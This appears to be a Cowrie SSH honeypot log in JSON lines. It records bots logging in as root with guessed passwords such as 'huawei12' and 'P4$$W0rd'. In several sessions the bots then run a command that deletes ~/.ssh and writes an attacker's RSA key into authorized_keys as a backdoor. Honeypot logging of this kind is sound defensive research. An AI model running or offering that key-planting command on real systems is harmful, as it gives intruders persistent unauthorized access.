{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:19:48.678621Z","src_ip":"51.81.118.153","session":"655cd9aa7c40"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:19:48.774773Z","src_ip":"51.81.118.153","session":"655cd9aa7c40"}
{"eventid":"cowrie.login.success","username":"root","password":"huawei12","message":"login attempt [root/huawei12] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:19:49.200282Z","src_ip":"51.81.118.153","session":"655cd9aa7c40"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:19:49.417281Z","src_ip":"51.81.118.153","session":"655cd9aa7c40"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:19:49.417998Z","src_ip":"51.81.118.153","session":"655cd9aa7c40"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:19:49.419213Z","src_ip":"51.81.118.153","session":"655cd9aa7c40"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:19:49.517446Z","src_ip":"51.81.118.153","session":"655cd9aa7c40"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:19:49.820135Z","src_ip":"51.81.118.153","session":"655cd9aa7c40"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:19:49.821090Z","src_ip":"51.81.118.153","session":"655cd9aa7c40"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:19:49.919757Z","src_ip":"51.81.118.153","session":"655cd9aa7c40"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:19:49.920952Z","src_ip":"51.81.118.153","session":"655cd9aa7c40"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":50718,"dst_ip":"1.2.3.4","dst_port":22,"session":"a979d5a0dd64","protocol":"ssh","message":"New connection: 51.81.118.153:50718 (1.2.3.4:22) [session: a979d5a0dd64]","sensor":"my-vps","timestamp":"2025-09-09T04:19:50.017292Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:19:50.020004Z","src_ip":"51.81.118.153","session":"a979d5a0dd64"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:19:50.117132Z","src_ip":"51.81.118.153","session":"a979d5a0dd64"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:19:50.506438Z","src_ip":"51.81.118.153","session":"a979d5a0dd64"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:19:51.607883Z","src_ip":"51.81.118.153","session":"a979d5a0dd64"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":50720,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ad172258123","protocol":"ssh","message":"New connection: 51.81.118.153:50720 (1.2.3.4:22) [session: 2ad172258123]","sensor":"my-vps","timestamp":"2025-09-09T04:19:51.702174Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:19:51.703335Z","src_ip":"51.81.118.153","session":"2ad172258123"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:19:51.798944Z","src_ip":"51.81.118.153","session":"2ad172258123"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":37658,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea3a65dd0f3b","protocol":"ssh","message":"New connection: 192.210.135.20:37658 (1.2.3.4:22) [session: ea3a65dd0f3b]","sensor":"my-vps","timestamp":"2025-09-09T04:19:52.228559Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:19:52.230787Z","src_ip":"192.210.135.20","session":"ea3a65dd0f3b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:19:52.232089Z","src_ip":"51.81.118.153","session":"2ad172258123"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:19:52.330300Z","src_ip":"51.81.118.153","session":"655cd9aa7c40"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:19:52.331712Z","src_ip":"51.81.118.153","session":"2ad172258123"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:19:52.340173Z","src_ip":"192.210.135.20","session":"ea3a65dd0f3b"}
{"eventid":"cowrie.login.success","username":"root","password":"0okmNJI(","message":"login attempt [root/0okmNJI(] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:19:52.820401Z","src_ip":"192.210.135.20","session":"ea3a65dd0f3b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:19:53.090890Z","src_ip":"192.210.135.20","session":"ea3a65dd0f3b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:19:53.091658Z","src_ip":"192.210.135.20","session":"ea3a65dd0f3b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:19:53.092988Z","src_ip":"192.210.135.20","session":"ea3a65dd0f3b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:19:53.203851Z","src_ip":"192.210.135.20","session":"ea3a65dd0f3b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:19:53.439611Z","src_ip":"192.210.135.20","session":"ea3a65dd0f3b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:19:53.440410Z","src_ip":"192.210.135.20","session":"ea3a65dd0f3b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:19:53.552179Z","src_ip":"192.210.135.20","session":"ea3a65dd0f3b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:19:53.553142Z","src_ip":"192.210.135.20","session":"ea3a65dd0f3b"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":39066,"dst_ip":"1.2.3.4","dst_port":22,"session":"718afb34eb2f","protocol":"ssh","message":"New connection: 192.210.135.20:39066 (1.2.3.4:22) [session: 718afb34eb2f]","sensor":"my-vps","timestamp":"2025-09-09T04:19:53.660760Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:19:53.661403Z","src_ip":"192.210.135.20","session":"718afb34eb2f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:19:53.771041Z","src_ip":"192.210.135.20","session":"718afb34eb2f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:19:54.252111Z","src_ip":"192.210.135.20","session":"718afb34eb2f"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:19:55.363721Z","src_ip":"192.210.135.20","session":"718afb34eb2f"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":39786,"dst_ip":"1.2.3.4","dst_port":22,"session":"72e6a9f3120b","protocol":"ssh","message":"New connection: 192.210.135.20:39786 (1.2.3.4:22) [session: 72e6a9f3120b]","sensor":"my-vps","timestamp":"2025-09-09T04:19:55.472262Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:19:55.472928Z","src_ip":"192.210.135.20","session":"72e6a9f3120b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:19:55.582342Z","src_ip":"192.210.135.20","session":"72e6a9f3120b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:19:56.060163Z","src_ip":"192.210.135.20","session":"72e6a9f3120b"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:19:56.170992Z","src_ip":"192.210.135.20","session":"ea3a65dd0f3b"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:19:56.171868Z","src_ip":"192.210.135.20","session":"72e6a9f3120b"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":34894,"dst_ip":"1.2.3.4","dst_port":22,"session":"57f0a7375cec","protocol":"ssh","message":"New connection: 152.32.190.168:34894 (1.2.3.4:22) [session: 57f0a7375cec]","sensor":"my-vps","timestamp":"2025-09-09T04:20:14.708848Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:20:14.709973Z","src_ip":"152.32.190.168","session":"57f0a7375cec"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:20:14.966063Z","src_ip":"152.32.190.168","session":"57f0a7375cec"}
{"eventid":"cowrie.login.success","username":"root","password":"P4$$W0rd","message":"login attempt [root/P4$$W0rd] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:20:16.031076Z","src_ip":"152.32.190.168","session":"57f0a7375cec"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:20:16.589904Z","src_ip":"152.32.190.168","session":"57f0a7375cec"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:20:16.590686Z","src_ip":"152.32.190.168","session":"57f0a7375cec"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:20:16.591669Z","src_ip":"152.32.190.168","session":"57f0a7375cec"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:20:16.848805Z","src_ip":"152.32.190.168","session":"57f0a7375cec"}
